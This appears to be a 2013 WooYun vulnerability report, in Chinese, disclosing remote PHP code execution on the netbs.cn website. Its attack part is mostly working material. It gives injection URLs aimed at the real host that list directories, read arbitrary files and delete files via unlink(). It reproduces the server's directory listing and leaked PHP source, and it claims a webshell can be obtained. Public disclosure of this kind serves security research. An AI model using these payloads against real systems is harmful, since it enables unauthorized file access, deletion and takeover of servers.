当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042626

漏洞标题:网博士存在远程PHP代码执行漏洞

相关厂商:网博士

漏洞作者: w5r2

提交时间:2013-11-12 17:04

修复时间:2013-12-27 17:05

公开时间:2013-12-27 17:05

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

代码未过滤敏感字符,导致远程加载PHP代码执行代码。

详细说明:

http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../


.png


Array
(
[0] => .
[1] => ..
[2] => 123
[3] => 168
[4] => 20130720195947.rar
[5] => 2345
[6] => 360buy-union.txt
[7] => 82051.txt
[8] => HTML
[9] => Plugins
[10] => Top-verification.html
[11] => _WU8G02t5Wuoiw5yWg4Cfd4wz5g.html
[12] => a
[13] => about
[14] => ad
[15] => api
[16] => aspnet_client
[17] => baidu_verify_729eGdarRG.html
[18] => baidunews.xml
[19] => bbs
[20] => bdsitemap.txt
[21] => bdunion.txt
[22] => cert
[23] => check.txt
[24] => css
[25] => en
[26] => favicon.ico
[27] => google59c3fe0e4120c597.html
[28] => gs_union_verify_file.html
[29] => home
[30] => images
[31] => include
[32] => index
[33] => index.html
[34] => index.php
[35] => info
[36] => kLtLsTFNw_UD3XyZOfqZvQrBNHc.html
[37] => license.txt
[38] => main
[39] => mainindex.html
[40] => member
[41] => netbsdede
[42] => netbsmain.html
[43] => news
[44] => plus
[45] => qqmail_domain_verify.txt
[46] => robots.php
[47] => robots.txt
[48] => robots2.txt
[49] => shop
[50] => shuiyin.jpg
[51] => sitemap.html
[52] => sitemap.xml
[53] => sitemaps.xml
[54] => special
[55] => tags.php
[56] => templets
[57] => tool
[58] => uc_client
[59] => upload.php
[60] => uploads
[61] => version.inc.php
)
1


可以查看任意文件

Array
(
[0] => <?php
[1] => function is_domain($domain){
[2] => if(preg_match("/^([0-9a-z\-]{1,}\.)?[0-9a-z\-]{2,}\.([0-9a-z\-]{2,}\.)?[a-z]{2,}$/i", $domain)) {
[3] => return true;
[4] => }else{
[5] => return false;
[6] => }
[7] => }
[8] =>
[9] => function get_content($url){
[10] => if(!strpos($url, '://')) return 'Invalid URI';
[11] => $content = '';
[12] => if(ini_get('allow_url_fopen')){
[13] => $cnt=0;
[14] => while($cnt < 15 && ($content=@file_get_contents($url))===FALSE) $cnt++;
[15] => }
[16] => elseif(function_exists('curl_init')){
[17] => $handle = curl_init();
[18] => curl_setopt($handle, CURLOPT_URL, $url);
[19] => curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 5);
[20] => curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
[21] => curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 0);
[22] => $content = curl_exec($handle);
[23] => curl_close($handle);
[24] => }
[25] => elseif(function_exists('fsockopen')){
[26] => $urlinfo = parse_url($url);
[27] => $host = $urlinfo['host'];
[28] => $str = explode($host, $url);
[29] => $uri = $str[1];
[30] => unset($urlinfo, $str);
[31] => $content = '';
[32] => $fp = fsockopen($host, 80, $errno, $errstr, 30);
[33] => if(!$fp){
[34] => $content = 'Can Not Open Socket...';
[35] => }
[36] => else{
[37] => $out = "GET $uri HTTP/1.1\r\n";
[38] => $out.= "Host: $host \r\n";
[39] => $out.= "Accept: */*\r\n";
[40] => $out.= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n";
[41] => $out.= "Connection: Close\r\n\r\n";
[42] => fputs($fp, $out);
[43] => while (!feof($fp)){
[44] => $content .= fgets($fp, 4069);
[45] => }
[46] => fclose($fp);
[47] => }
[48] => }
[49] => if(empty($content)) $content = '无法打开该链接!';
[50] => return $content;
[51] => }
[52] => ?>
)


view-source:http://www.netbs.cn/tool/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../tool/global.php


可以删除文件

删除文件,参数n为文件名


http://www.netbs.cn/yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../xxxx.txt
还可以直接获取webshell

漏洞证明:

如上所示

修复方案:

过滤敏感字符!

版权声明:转载请注明来源 w5r2@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝